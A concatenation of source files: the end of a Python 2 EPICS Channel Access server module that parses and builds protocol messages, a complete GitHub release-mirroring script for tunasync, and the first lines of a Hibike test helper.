connections = {} # list of active client TCP connections
class TCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
addr = "%s:%d" % self.client_address
if DEBUG: debug("%s: accepted connection" % addr)
# Update list of active client connections.
connections[self.client_address] = self.request
while 1:
import socket
# Several messages may be concatenated. Read one at a time.
# The minimum message size is 16 bytes.
try: message = self.request.recv(16)
except socket.error:
if DEBUG: debug("%s: lost connection\n" % addr)
break
if len(message) == 0:
if DEBUG: debug("%s: client disconnected" % addr)
break
if len(message) < 4:
if DEBUG: debug("excepted 4 received %d bytes" % len(message))
break
# If the 'payload size' field has value > 0, 'payload size'
# more bytes are part of the message.
from struct import unpack
payload_size, = unpack(">H",message[2:4])
if payload_size > 0:
try: message += self.request.recv(payload_size)
except socket.error:
if DEBUG: debug("%s: lost connection\n" % addr)
if DEBUG: debug("%s: received: %s\n" % (addr,message_info(message)))
reply = process_message(self.client_address,message)
if reply:
if DEBUG: debug("%s: returning reply %r" % (addr,message_info(reply)))
try: self.request.sendall(reply)
except socket.error:
if DEBUG: debug("%s: lost connection\n" % addr)
# Update list of active client connections.
for PV in PVs.values():
if self.client_address in PV.subscribers:
del PV.subscribers[self.client_address]
del connections[self.client_address]
if DEBUG: debug("%s: closing connection" % addr)
self.request.close()
def process_message(address,request):
"""Interpret a CA protocol datagram"""
from struct import unpack
from time import time
header = request[0:16].ljust(16,'\0')
payload = request[16:]
command_code,payload_size,data_type,data_count,parameter1,parameter2 = \
unpack(">HHHHII",header)
command = command_name(command_code)
if command == "SEARCH":
# Client wants to knoww wether this server hosts a specific
# process variable
reply_flag = data_type
minor_version = data_count
channel_CID = parameter1 # client allocated ID for this transaction.
channel_name = payload.rstrip("\0")
if PV_exists(channel_name):
if DEBUG: debug("SEARCH,reply_flag=%r,minor_ver=%r,channel_CID=%r,channel_name=%r\n"
% (reply_flag,minor_version,channel_CID,channel_name))
return message("SEARCH",8,TCP_port_number,0,0xffffffff,channel_CID,
network_data(minor_version,types["SHORT"]))
# Reply flag: whether failed search response should be returned.
# 10 = do reply, 5 = do not reply
if reply_flag == 10:
return message("NOT_FOUND",0,reply_flag,minor_version,channel_CID,
channel_CID)
elif command == "VERSION":
# Client 'greeting' after opening a TCP connection, part 1
# There is no response to this command.
pass
##if DEBUG: debug("VERSION\n")
elif command == "CLIENT_NAME":
# Client 'greeting' after opening a TCP connection, part 2
# There is no response to this command.
if DEBUG: debug("CLIENT_NAME\n")
elif command == "HOST_NAME":
# Client 'greeting' after opening a TCP connection, part 3
# There is no response to this command.
if DEBUG: debug("HOST_NAME\n")
elif command == "CREATE_CHAN":
# Client requests "session identity" for a process variable passed by
# name.
channel_CID = parameter1
minor_version = parameter2
channel_name = payload.rstrip("\0")
if DEBUG: debug("CREATE_CHAN channel_CID=%r, minor_version=%r" %
(channel_CID,minor_version))
if not PV_exists(channel_name): return
if not channel_name in PVs.keys(): PVs[channel_name] = PV_info()
PV = PVs[channel_name]
val = PV_value(channel_name)
data_type = CA_type(val)
data_count = CA_count(val)
if PV.channel_SID == None:
channel_SIDs = [pv.channel_SID for pv in PVs.values()]
PV.channel_SID = 1
while PV.channel_SID in channel_SIDs: PV.channel_SID += 1
reply = message("CREATE_CHAN",0,data_type,data_count,channel_CID,
PV.channel_SID)
access_rights = 3 # Read and write
reply += message("ACCESS_RIGHTS",0,0,0,channel_CID,access_rights)
return reply
elif command == "READ_NOTIFY":
# Client wants know the current value if a process variable,
# referenced by server ID, without receiving update events.
# Channel Access Protocol Specification, section 6.15.2, says:
# parameter 1: channel_SID, parameter 2: IOID
# However, I always get: parameter 1 = 1, parameter 2 = 1.
# Thus, I assume:
# parameter 1: status_code, parameter 2: IOID
# status_code = 1 indicates normal successful completion
channel_SID = parameter1
IOID = parameter2
if DEBUG: debug("READ_NOTIFY data_type=%r,data_count=%r,channel_SID=%r,IOID=%r"
% (data_type,data_count,channel_SID,IOID))
for PV_name in PVs.keys():
PV = PVs[PV_name]
if PV.channel_SID == channel_SID:
status_code = 1 # Normal successful completion
val = PV_value(PV_name)
data_count = CA_count(val)
data = network_data(val,data_type)
reply = message("READ_NOTIFY",0,data_type,data_count,status_code,
IOID,data)
return reply
elif command == "EVENT_ADD":
# Client wants to receive update events for a given process variable.
channel_SID = parameter1
subscription_ID = parameter2
low_val,high_val,to_val,mask = unpack(">fffH",payload[0:14])
if DEBUG: debug("EVENT_ADD {data_type:%s, data_count:%r, "\
"channel_SID:%r, subscription_ID:%r}, "\
"payload={low_val:%r, high_val:%r, to_val:%r, mask:%r}"
% (type_name(data_type),data_count,channel_SID,subscription_ID,
low_val,high_val,to_val,mask))
for PV_name in PVs.keys():
PV = PVs[PV_name]
if PV.channel_SID == channel_SID:
PV.subscribers[address] = \
subscriber_info(subscription_ID,data_type,data_count)
subscriber = PV.subscribers[address]
status_code = 1 # Normal successful completion
val = PV_value(PV_name)
data_count = CA_count(val)
data = network_data(val,data_type)
return message("EVENT_ADD",0,data_type,data_count,
status_code,subscription_ID,data)
elif command == "WRITE_NOTIFY":
# Client wants to modify a process variable.
# This requests needs to be confirmed by a WRITE_NOTIFY reply when
# complete.
channel_SID = parameter1
IOID = parameter2
new_value = value(data_type,data_count,payload)
if DEBUG: debug("WRITE_NOTIFY data_type=%r, data_count=%r, channel_SID=%r, "\
"IOID=%r, value=%r\n" %
(data_type,data_count,channel_SID,IOID,new_value))
for PV_name in PVs.keys():
PV = PVs[PV_name]
if PV.channel_SID == channel_SID:
if DEBUG: debug("Changing %r to %r\n" % (PV_name,new_value))
PV_set_value(PV_name,new_value)
call_callbacks(PV_name)
status_code = 1 # Normal successful completion
reply = message("WRITE_NOTIFY",0,data_type,data_count,
status_code,IOID)
return reply
elif command == "ACCESS_RIGHTS": # not a client request (server only)
channel_ID = parameter1
access_bits = parameter2
if DEBUG: debug("ACCESS_RIGHTS channel_ID=%r, access_bits=%s (ignored)\n" %
(channel_ID,access_bits))
elif command == "WRITE":
# Client wants to modify a process variable.
# Unlike WRITE_NOTIFY, there is no response to this command.
channel_SID = parameter1
IOID = parameter2
new_value = value(data_type,data_count,payload)
if DEBUG: debug("WRITE data_type=%r, data_count=%r, channel_SID=%r, "\
"IOID=%r, value=%r\n" %
(data_type,data_count,channel_SID,IOID,new_value))
for PV_name in PVs.keys():
PV = PVs[PV_name]
if PV.channel_SID == channel_SID:
if DEBUG: debug("Changing %r to %r\n" % (PV_name,new_value))
PV_set_value(PV_name,new_value)
call_callbacks(PV_name)
elif command == "ECHO":
# Client wants to be sure that server is still alive and reachable.
return message("ECHO",0,0,0,0,0)
elif command == 'EVENT_CANCEL':
# Opposite of EVENT_ADD.
# Client no longer wants to receive update events.
channel_SID = parameter1
subscription_ID = parameter2
if DEBUG: debug("EVENT_CANCEL {data_type:%s,data_count:%r, "\
"channel_SID:%r,subscription_ID:%r},"
% (type_name(data_type),data_count,channel_SID,subscription_ID))
for PV_name in PVs.keys():
PV = PVs[PV_name]
if PV.channel_SID == channel_SID:
if address in PV.subscribers and \
PV.subscribers[address].subscription_ID == subscription_ID:
del PV.subscribers[address]
if DEBUG: debug("Cancelled updates for %r %r" % (PV_name,address))
elif command == 'CLEAR_CHANNEL':
# Opposite of CREATE_CHAN. Client indicates it will not use a certain
# client ID for a PV any longer.
channel_SID = parameter1
channel_CID = parameter2
if DEBUG: debug("CLEAR_CHANNEL channel_SID=%r, channel_CID=%r" %
(channel_SID,channel_CID))
# Nothing to do, because there is no status information associated
# with a channel CID. There are no resources allocated per-channel CID.
return message('CLEAR_CHANNEL',0,0,0,channel_SID,channel_CID)
else:
if DEBUG: debug("command %r: not supported (yet)\n" % command)
def object_name(object):
"""Convert Python object to string"""
if hasattr(object,"__name__"): return object.__name__
else: return repr(object)
def message(command=0,payload_size=0,data_type=0,data_count=0,
parameter1=0,parameter2=0,payload=""):
"""Assemble a Channel Access message datagram for network transmission"""
if type(command) == str: command = commands[command]
assert data_type is not None
assert data_count is not None
assert parameter1 is not None
assert parameter2 is not None
from math import ceil
from struct import pack
if payload_size == 0 and len(payload) > 0:
# Pad to multiple of 8.
payload_size = int(ceil(len(payload)/8.)*8)
while len(payload) < payload_size: payload += "\0"
# 16-byte header consisting of four 16-bit integers
# and two 32-bit integers in big-edian byte order.
header = pack(">HHHHII",command,payload_size,data_type,data_count,
parameter1,parameter2)
message = header + payload
return message
def message_info(message):
"""Text representation of the CA message datagram"""
from struct import unpack
if len(message) < 16: return "invalid message %r" % message
header = message[0:16]
payload = message[16:]
command_code,payload_size,data_type,data_count,parameter1,parameter2 = \
unpack(">HHHHII",header)
s = str(command_code)
command = command_name(command_code)
if command: s += "("+command+")"
s += ","+str(payload_size)
s += ","+str(data_type)
if data_type in types.values():
s += "("+types.keys()[types.values().index(data_type)]+")"
s += ","+str(data_count)
s += ", %r, %r" % (parameter1,parameter2)
if payload:
s += ", %r" % payload
if command in ("EVENT_ADD","WRITE","WRITE_NOTIFY","READ_NOTIFY"):
s += "("
header = header_info(data_type,payload)
if header: s += header+"; "
s += repr(value(data_type,data_count,payload))
s += ")"
return s
def send(socket,message):
"""Return a reply to a client using TCP/IP"""
from socket import error as socket_error
try: addr = "%s:%d" % socket.getpeername()
except socket_error: addr = "?"
if DEBUG: debug("Send %s %s\n" % (addr,message_info(message)))
##socket.setblocking(0)
try: socket.sendall(message)
except socket_error,error:
if DEBUG: debug("Send failed %r\n" % error)
def value(data_type,data_count,payload):
"""Convert network binary data to a Python data type
data_type: integer data type code"""
if payload == None: return None
from struct import unpack
data_type = type_name(data_type)
header_size = 0
if data_type.startswith("STS_"):
header_size = 2+2 # status,severity
# Add alignment padding to header.
if data_type.endswith("CHAR"): header_size += 1
elif data_type.endswith("DOUBLE"):header_size += 4
elif data_type.startswith("TIME_"):
header_size = 12
# Add alignment padding to header.
if data_type.endswith("SHORT"): header_size += 2
elif data_type.endswith("ENUM"): header_size += 2
elif data_type.endswith("CHAR"): header_size += 3
elif data_type.endswith("DOUBLE"):header_size += 4
elif data_type.startswith("GR_"):
header_size = 2+2 # status,severity
if data_type.endswith("STRING"): pass
elif data_type.endswith("SHORT"): header_size += 8+6*2 # unit,limits
elif data_type.endswith("FLOAT"): header_size += 2+2+8+6*4 # precision,pad,unit,limits
elif data_type.endswith("ENUM"): header_size += 2+16*26 # nstrings,strings
elif data_type.endswith("CHAR"): header_size += 8+6*1+1 # unit,limits,pad
elif data_type.endswith("LONG"): header_size += 8+6*4 # unit,limits
elif data_type.endswith("DOUBLE"):header_size += 2+2+8+6*8 # precision,pad,unit,limits
else:
if DEBUG: debug("value: data type %r not supported\n" % data_type)
elif data_type.startswith("CTRL_"):
header_size = 2+2 # status,severity
if data_type.endswith("STRING"): pass
elif data_type.endswith("SHORT"): header_size += 8+8*2 # unit,limits
elif data_type.endswith("FLOAT"): header_size += 2+2+8+8*4 # precision,pad,unit,limits
elif data_type.endswith("ENUM"): header_size += 2+16*26 # nstrings,strings
elif data_type.endswith("CHAR"): header_size += 8+8*1+1 # unit,limits,pad
elif data_type.endswith("LONG"): header_size += 8+8*4 # unit,limits
elif data_type.endswith("DOUBLE"):header_size += 2+2+8+8*8 # precision,pad,unit,limits
else:
if DEBUG: debug("value: data type %r not supported\n" % data_type)
payload = payload[header_size:] # strip off header
if data_type.endswith("STRING"):
# Null-terminated string.
# data_count is the number of null-terminated strings (characters)
value = payload.split("\0")[0:data_count]
if len(value) == 1: value = value[0]
elif data_type.endswith("SHORT"):
if data_count > len(payload)/2: data_count = max(len(payload)/2,1)
payload = payload.ljust(2*data_count,"\0")
value = list(unpack(">%dh"%data_count,payload[0:2*data_count]))
if len(value) == 1: value = value[0]
elif data_type.endswith("FLOAT"):
if data_count > len(payload)/4: data_count = max(len(payload)/4,1)
payload = payload.ljust(4*data_count,"\0")
value = list(unpack(">%df"%data_count,payload[0:4*data_count]))
if len(value) == 1: value = value[0]
elif data_type.endswith("ENUM"):
if data_count > len(payload)/2: data_count = max(len(payload)/2,1)
payload = payload.ljust(2*data_count,"\0")
value = list(unpack(">%dh"%data_count,payload[0:2*data_count]))
if len(value) == 1: value = value[0]
elif data_type.endswith("CHAR"):
if data_count > len(payload)/1: data_count = max(len(payload)/1,1)
payload = payload.ljust(1*data_count,"\0")
value = list(unpack("%db"%data_count,payload[0:1*data_count]))
if len(value) == 1: value = value[0]
elif data_type.endswith("LONG"):
if data_count > len(payload)/4: data_count = max(len(payload)/4,1)
payload = payload.ljust(4*data_count,"\0")
value = list(unpack(">%di"%data_count,payload[0:4*data_count]))
if len(value) == 1: value = value[0]
elif data_type.endswith("DOUBLE"):
if data_count > len(payload)/8: data_count = max(len(payload)/8,1)
payload = payload.ljust(8*data_count,"\0")
value = list(unpack(">%dd"%data_count,payload[0:8*data_count]))
if len(value) == 1: value = value[0]
else:
if DEBUG: debug("value: unsupported data type %r\n" % data_type)
value = payload
return value
def header_info(data_type,payload):
"""Report additional non-payload in network binary data.
These can be status, time, grapic or control structures"""
# Structures are defined in db_access.h.
if payload == None: return ""
from struct import unpack
data_type = type_name(data_type)
if data_type.startswith("STS_"):
status,severity = unpack(">HH",payload[0:4])
# Expecting status = 0 (normal), severity = 1 (success)
return "{status:%d,severity:%d}" % (status,severity)
elif data_type.startswith("TIME_"):
status,severity = unpack(">HH",payload[0:4])
# The time stamp is represented as two uint32 values. The first is the
# number of seconds passed since 1 Jan 1990 00:00 GMT. The second is the
# number of nanoseconds within the second.
seconds,nanoseconds = unpack(">II",payload[4:12])
from time import mktime,strftime,gmtime
offset = mktime((1990,1,1,0,0,0,0,0,0))-mktime((1970,1,1,0,0,0,0,0,0))
t = seconds+nanoseconds*1e-9 + offset
timestamp = strftime("%Y-%m-%d %H:%M:%S GMT",gmtime(t))
return "{status:%d,severity:%d, timestamp:%s}" % \
(status,severity,timestamp)
elif data_type.startswith("GR_"):
status,severity = unpack(">HH",payload[0:4])
info = "status:%d,severity:%d, " % (status,severity)
if data_type.endswith("STRING"): pass
elif data_type.endswith("SHORT"):
unit = payload[8:16].rstrip("\0")
limits = unpack("6h",payload[16:16+6*2])
info += "unit=%r,limits=%r" % (unit,limits)
elif data_type.endswith("FLOAT"):
precision, = unpack(">h",payload[4:6])
unit = payload[8:16].rstrip("\0")
limits = unpack(">6f",payload[16:16+6*4])
info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
elif data_type.endswith("ENUM"):
nstrings, = unpack(">h",payload[4:6])
strings = payload[6:6+16*26]
info += "nstrings=%r" % nstrings
elif data_type.endswith("CHAR"):
unit = payload[8:16].rstrip("\0")
limits = unpack("6b",payload[16:16+6*1])
info += "unit=%r,limits=%r" % (unit,limits)
elif data_type.endswith("LONG"):
unit = payload[8:16].rstrip("\0")
limits = unpack("6i",payload[16:16+6*4])
info += "unit=%r,limits=%r" % (unit,limits)
elif data_type.endswith("DOUBLE"):
precision, = unpack(">h",payload[4:6])
unit = payload[8:16].rstrip("\0")
limits = unpack(">6d",payload[16:16+6*8])
info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
else: info += "?"
info = info.restrip(", ")
return "{"+info+"}"
elif data_type.startswith("CTRL_"):
status,severity = unpack(">HH",payload[0:4])
info = "status:%d,severity:%d, " % (status,severity)
if data_type.endswith("STRING"): pass
elif data_type.endswith("SHORT"):
unit = payload[8:16].rstrip("\0")
limits = unpack("8h",payload[16:16+8*2])
info += "unit=%r,limits=%r" % (unit,limits)
elif data_type.endswith("FLOAT"):
precision, = unpack(">h",payload[4:6])
unit = payload[8:16].rstrip("\0")
limits = unpack(">8f",payload[16:16+8*4])
info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
elif data_type.endswith("ENUM"):
nstrings, = unpack(">h",payload[4:6])
strings = payload[6:6+16*26]
info += "nstrings=%r" % nstrings
elif data_type.endswith("CHAR"):
unit = payload[8:16].rstrip("\0")
limits = unpack("8b",payload[16:16+8*1])
info += "unit=%r,limits=%r" % (unit,limits)
elif data_type.endswith("LONG"):
unit = payload[8:16].rstrip("\0")
limits = unpack("8i",payload[16:16+8*4])
info += "unit=%r,limits=%r" % (unit,limits)
elif data_type.endswith("DOUBLE"):
precision, = unpack(">h",payload[4:6])
unit = payload[8:16].rstrip("\0")
limits = unpack(">8d",payload[16:16+8*8])
info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
else: info += "?"
info = info.rstrip(", ")
return "{"+info+"}"
return ""
def convert(PV_name,value):
"""Convert value to the correct data type for the given process variable"""
# The value of a PV might be passed as string when the PV type is acually
# DOUBLE.
current_value = PV_value(PV_name)
if current_value is None: new_value = value
elif not isarray(current_value):
dtype = type(current_value)
try: new_value = dtype(value)
except Exception,message:
if DEBUG: debug("convert: %r from %r to %r failed: %r" %
(PV_name,value,dtype,message))
new_value = dtype()
else:
if not isarray(value): value = [value]
# Convert each array element.
if len(current_value) > 0: dtype = type(current_value[0])
else: dtype = float
try: new_value = [dtype(x) for x in value]
except Exception,message:
if DEBUG: debug("convert: %r from %r to %r failed: %r" %
(PV_name,value,dtype,message))
new_value = [dtype()]*len(value)
if new_value != value:
if DEBUG: debug("converting %r from %r to %r" % (PV_name,value,new_value))
return new_value
def CA_type(value):
"""Channel Access data type for a Python variable as integer type code"""
if issubclass(type(value),basestring): return types["STRING"]
if hasattr(value,"dtype"): # value is an array
from numpy import int8,int16,int32,float32,int64,float64
if value.dtype == int16: return types["SHORT"]
if value.dtype == float32: return types["FLOAT"]
if value.dtype == int8: return types["CHAR"]
if value.dtype == int32: return types["LONG"]
if value.dtype == int64: return types["LONG"]
if value.dtype == float64: return types["DOUBLE"]
if value.dtype == bool: return types["CHAR"]
return types["STRING"]
# If a list if given, use the first element to determine the type.
if isarray(value):
if len(value)>0: value = value[0]
else: return types["DOUBLE"]
if type(value) == int: return types["LONG"]
if type(value) == float: return types["DOUBLE"]
if type(value) == bool: return types["SHORT"]
return types["STRING"]
def CA_count(value):
"""If value is an array return the number of elements, else return 1.
In CA, a string counts as a single element."""
if issubclass(type(value),basestring): return 1
if isarray(value): return len(value)
return 1
def network_data(value,data_type):
"""Convert a Python data type to binary data for network transmission
data_type: integer number for CA payload data type (0 = STRING, 1 = SHORT)
"""
from struct import pack
data_type = type_name(data_type)
payload = ""
precision = 8 # Number of digits displayed in MEDM screen
if data_type.startswith("STS_"):
status = 0 # 0 = normal
severity = 1 # 1 = success
payload += pack(">HH",status,severity)
# Add alignment padding to the header.
if data_type.endswith("CHAR"): payload += '\0'
elif data_type.endswith("DOUBLE"): payload += '\0'*4
elif data_type.startswith("TIME_"):
# Add time header
from time import mktime,time
status = 0 # 0 = normal
severity = 1 # 1 = sucess
# The time stamp is represented as two uint32 values. The first is the
# number of seconds passed since 1 Jan 1990 00:00 GMT. The second is the
# number of nanoseconds within the second.
offset = mktime((1990,1,1,0,0,0,0,0,0))-mktime((1970,1,1,0,0,0,0,0,0))
timestamp = time()-offset
seconds = int(timestamp)
nanoseconds = int((timestamp%1)*1e9)
payload += pack(">HHII",status,severity,seconds,nanoseconds)
# Add alignment padding to the header.
if data_type.endswith("SHORT"): payload += '\0'*2
elif data_type.endswith("ENUM"): payload += '\0'*2
elif data_type.endswith("CHAR"): payload += '\0'*3
elif data_type.endswith("DOUBLE"): payload += '\0'*4
elif data_type.startswith("GR_"):
status = 0 # 0 = normal
severity = 1 # 1 = success
payload += pack(">HH",status,severity)
if data_type.endswith("STRING"): pass
elif data_type.endswith("SHORT"):
payload += '\0'*(8+6*2) # unit,limits
elif data_type.endswith("FLOAT"):
payload += pack(">h",precision)
payload += '\0'*(2+8+6*4) # pad,unit,limits
elif data_type.endswith("ENUM"):
payload += '\0'*(2+16*26) # number of strings,strings
elif data_type.endswith("CHAR"):
payload += '\0'*(8+6*1+1) # unit,limits,pad
elif data_type.endswith("LONG"):
payload += '\0'*(8+6*4) # unit,limits
elif data_type.endswith("DOUBLE"):
payload += pack(">h",precision)
payload += '\0'*(2+8+6*8) # pad,unit,limits
else:
if DEBUG: debug("network_data: data type %r not supported\n" % data_type)
elif data_type.startswith("CTRL_"):
status = 0 # 0 = normal
severity = 1 # 1 = success
payload += pack(">HH",status,severity)
if data_type.endswith("STRING"): pass
elif data_type.endswith("SHORT"):
payload += '\0'*(8+8*2) # unit,limits
elif data_type.endswith("FLOAT"):
payload += pack(">h",precision)
payload += '\0'*(2+8+8*4) # pad,unit,limits
elif data_type.endswith("ENUM"):
payload += '\0'*(2+16*26) # number of strings,strings
elif data_type.endswith("CHAR"):
payload += '\0'*(8+8*1+1) # unit,limits,pad
elif data_type.endswith("LONG"):
payload += '\0'*(8+8*4) # unit,limits
elif data_type.endswith("DOUBLE"):
payload += pack(">h",precision)
payload += '\0'*(2+8+8*8) # pad,unit,limits
else:
if DEBUG: debug("network_data: data type %r not supported\n" % data_type)
from numpy import int8,int16,int32,float32,float64
if data_type.endswith("STRING"):
if isarray(value):
# Null-terminated strings.
payload += "\0".join([str(v) for v in value])
else: payload += str(value)
elif data_type.endswith("SHORT"):
if isarray(value):
for v in value: payload += pack(">h",to(v,int16))
else: payload += pack(">h",to(value,int16))
elif data_type.endswith("FLOAT"):
if isarray(value):
for v in value: payload += pack(">f",to(v,float32))
else: payload += pack(">f",to(value,float32))
elif data_type.endswith("ENUM"):
if isarray(value):
for v in value: payload += pack(">h",to(v,int16))
else: payload += pack(">h",to(value,int16))
elif data_type.endswith("CHAR"):
if isarray(value):
for v in value: payload += pack("b",to(v,int8))
else: payload += pack("b",to(value,int8))
elif data_type.endswith("LONG"):
if isarray(value):
for v in value: payload += pack(">i",to(v,int32))
else: payload += pack(">i",to(value,int32))
elif data_type.endswith("DOUBLE"):
if isarray(value):
for v in value: payload += pack(">d",to(v,float64))
else: payload += pack(">d",to(value,float64))
else:
if DEBUG: debug("network_data: unsupported data type %r\n" % data_type)
payload += str(value)
return payload
def to(value,dtype):
"""Force conversion to int data type. If failed return 0:
dtype: int8, int32, int64"""
isfloat = "float" in str(dtype)
try: return dtype(value)
except: return 0 if not isfloat else 0.0
def isarray(value):
"Is the value a container, like tuple, list or numpy array?"
if issubclass(type(value),basestring): return False
if hasattr(value,"__len__"): return True
else: return False
def date_string(seconds=None):
"""Date and time as formatted ASCCI text, precise to 1 ms"""
if seconds is None:
from time import time
seconds = time()
from datetime import datetime
timestamp = str(datetime.fromtimestamp(seconds))
return timestamp[:-3] # omit microsconds
def modulename():
"""Name of this Python module, without directory and extension,
as used for 'import'"""
from inspect import getmodulename,getfile
return getmodulename(getfile(modulename))
def nan_equal(a,b):
"""Do a and b have the same value?
Return value: True or False"""
##if DEBUG: debug("nan_equal(%r,%r)?" % (a,b))
a,b = PV_data(a),PV_data(b)
from numpy import isnan
try:
if isnan(a) and isnan(b): return True
except: pass
# Work-around for the following problem:
# if a == b: ...
# ValueError: The truth value of an array with more than one element is
# ambiguous. Use a.any() or a.all()
if not isinstance(a,basestring) and not isinstance(b,basestring) and \
hasattr(a,"__len__") and hasattr(b,"__len__") and len(a) == len(b):
return all([nan_equal(x,y) for (x,y) in zip(a,b)])
return bool(a == b)
def nan_equal_2(a,b):
"""Are two arrays containing nan identical, assuming nan == nan?"""
from numpy import asarray
from numpy.testing import assert_equal
a,b = asarray(a),asarray(b)
try: assert_equal(a,b)
except: value = False
value = True
if DEBUG: debug("nan_equal(%r,%r): %r" % (a,b,value))
return value
def logfile(): return "" # for backward compatibility
if __name__ == "__main__": # for testing
from pdb import pm
import logging
from tempfile import gettempdir
logfile = gettempdir()+"/CAServer.log"
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s: %(levelname)s %(message)s",
##filename=logfile,
)
DEBUG = True
PV_name = "TEST:TEST.VAL"
casput(PV_name,"test")
print('from epics import *; caget(%r)' % PV_name)
print('from epics import *; camonitor(%r)' % PV_name)
|
github-release.py | #!/usr/bin/env python3
import os
import sys
import threading
import traceback
import queue
from pathlib import Path
from datetime import datetime
import requests
import yaml
BASE_URL = os.getenv("UPSTREAM_URL", "https://api.github.com/repos/")
WORKING_DIR = os.getenv("TUNASYNC_WORKING_DIR")
WORKERS = int(os.getenv("WORKERS", "8"))
FAST_SKIP = bool(os.getenv("FAST_SKIP", ""))
def get_repos():
try:
with open('/repos.yaml') as f:
content = f.read()
except FileNotFoundError:
content = os.getenv("REPOS", None)
if content is None:
raise Exception("Loading /repos.yaml file and reading REPOS env both failed")
repos = yaml.safe_load(content)
if isinstance(repos, list):
return repos
else:
repos = repos['repos']
if not isinstance(repos, list):
raise Exception("Can not inspect repo list from the given file/env")
return repos
REPOS = get_repos()
# connect and read timeout value
TIMEOUT_OPTION = (7, 10)
total_size = 0
def sizeof_fmt(num, suffix='iB'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.2f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.2f%s%s" % (num, 'Y', suffix)
# wrap around requests.get to use token if available
def github_get(*args, **kwargs):
headers = kwargs['headers'] if 'headers' in kwargs else {}
if 'GITHUB_TOKEN' in os.environ:
headers['Authorization'] = 'token {}'.format(
os.environ['GITHUB_TOKEN'])
kwargs['headers'] = headers
return requests.get(*args, **kwargs)
def do_download(remote_url: str, dst_file: Path, remote_ts: float):
# NOTE the stream=True parameter below
with github_get(remote_url, stream=True) as r:
r.raise_for_status()
with open(dst_file, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024**2):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
# f.flush()
os.utime(dst_file, (remote_ts, remote_ts))
def downloading_worker(q):
while True:
item = q.get()
if item is None:
break
url, dst_file, working_dir, updated = item
print("downloading", url, "to",
dst_file.relative_to(working_dir), flush=True)
try:
do_download(url, dst_file, updated)
except Exception:
print("Failed to download", url, flush=True)
if dst_file.is_file():
dst_file.unlink()
q.task_done()
def create_workers(n):
task_queue = queue.Queue()
for i in range(n):
t = threading.Thread(target=downloading_worker, args=(task_queue, ))
t.start()
return task_queue
def ensure_safe_name(filename):
filename = filename.replace('\0', ' ')
if filename == '.':
return ' .'
elif filename == '..':
return '. .'
else:
return filename.replace('/', '\\').replace('\\', '_')
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--base-url", default=BASE_URL)
parser.add_argument("--working-dir", default=WORKING_DIR)
parser.add_argument("--workers", default=WORKERS, type=int,
help='number of concurrent downloading jobs')
parser.add_argument("--fast-skip", action='store_true', default=FAST_SKIP,
help='do not verify size and timestamp of existing files')
args = parser.parse_args()
if args.working_dir is None:
raise Exception("Working Directory is None")
working_dir = Path(args.working_dir)
task_queue = create_workers(args.workers)
remote_filelist = []
cleaning = False
def download(release, release_dir, tarball=False):
global total_size
if tarball:
url = release['tarball_url']
updated = datetime.strptime(
release['published_at'], '%Y-%m-%dT%H:%M:%SZ').timestamp()
dst_file = release_dir / 'repo-snapshot.tar.gz'
remote_filelist.append(dst_file.relative_to(working_dir))
if dst_file.is_file():
print("skipping", dst_file.relative_to(working_dir), flush=True)
else:
dst_file.parent.mkdir(parents=True, exist_ok=True)
task_queue.put((url, dst_file, working_dir, updated))
for asset in release['assets']:
url = asset['browser_download_url']
updated = datetime.strptime(
asset['updated_at'], '%Y-%m-%dT%H:%M:%SZ').timestamp()
dst_file = release_dir / ensure_safe_name(asset['name'])
remote_filelist.append(dst_file.relative_to(working_dir))
total_size += asset['size']
if dst_file.is_file():
if args.fast_skip:
print("fast skipping", dst_file.relative_to(
working_dir), flush=True)
continue
else:
stat = dst_file.stat()
local_filesize = stat.st_size
local_mtime = stat.st_mtime
# print(f"{local_filesize} vs {asset['size']}")
# print(f"{local_mtime} vs {updated}")
if local_mtime > updated or \
asset['size'] == local_filesize and local_mtime == updated:
print("skipping", dst_file.relative_to(
working_dir), flush=True)
continue
else:
dst_file.parent.mkdir(parents=True, exist_ok=True)
task_queue.put((url, dst_file, working_dir, updated))
def link_latest(name, repo_dir):
try:
os.unlink(repo_dir / "LatestRelease")
except OSError:
pass
try:
os.symlink(name, repo_dir / "LatestRelease")
except OSError:
pass
for cfg in REPOS:
flat = False # build a folder for each release
versions = 1 # keep only one release
tarball = False # do not download the tarball
prerelease = False # filter out pre-releases
if isinstance(cfg, str):
repo = cfg
else:
repo = cfg["repo"]
if "versions" in cfg:
versions = cfg["versions"]
if "flat" in cfg:
flat = cfg["flat"]
if "tarball" in cfg:
tarball = cfg["tarball"]
if "pre_release" in cfg:
prerelease = cfg["pre_release"]
repo_dir = working_dir / Path(repo)
print(f"syncing {repo} to {repo_dir}")
try:
r = github_get(f"{args.base_url}{repo}/releases")
r.raise_for_status()
releases = r.json()
except:
traceback.print_exc()
break
n_downloaded = 0
for release in releases:
if not release['draft'] and (prerelease or not release['prerelease']):
name = ensure_safe_name(release['name'] or release['tag_name'])
if len(name) == 0:
print("Error: Unnamed release")
continue
download(release, (repo_dir if flat else repo_dir / name), tarball)
if n_downloaded == 0 and not flat:
# create a symbolic link to the latest release folder
link_latest(name, repo_dir)
n_downloaded += 1
if versions > 0 and n_downloaded >= versions:
break
if n_downloaded == 0:
print(f"Error: No release version found for {repo}")
continue
else:
cleaning = True
# block until all tasks are done
task_queue.join()
# stop workers
for i in range(args.workers):
task_queue.put(None)
if cleaning:
local_filelist = []
for local_file in working_dir.glob('**/*'):
if local_file.is_file():
local_filelist.append(local_file.relative_to(working_dir))
for old_file in set(local_filelist) - set(remote_filelist):
print("deleting", old_file, flush=True)
old_file = working_dir / old_file
old_file.unlink()
for local_dir in working_dir.glob('*/*/*'):
if local_dir.is_dir():
try:
# remove empty dirs only
local_dir.rmdir()
except:
pass
print("Total size is", sizeof_fmt(total_size, suffix=""))
if __name__ == "__main__":
main()
# vim: ts=4 sw=4 sts=4 expandtab
|
hibike_tester.py | """
Create a separate Hibike process, for testing.
"""
import threading
import time
import queue
